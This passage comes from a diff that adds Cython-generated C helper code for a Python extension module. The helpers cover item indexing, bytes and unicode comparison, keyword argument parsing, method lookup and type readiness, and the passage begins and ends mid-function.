CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* TupleAndListFromArray */ + #if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ + static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ + static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ + #if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseDoubleKeywords */ + static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ + static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* RaiseArgTupleInvalid */ + static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* KeywordStringCheck */ + static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* FixUpExtensionType */ + #if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* PyObjectCallNoArg */ + static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectCallOneArg */ + static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectGetMethod */ + static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ + static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* ValidateBasesTuple */ + #if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ + static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* PyObject_GenericGetAttrNoDict */ + #if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ + #if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* SetupReduce */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = 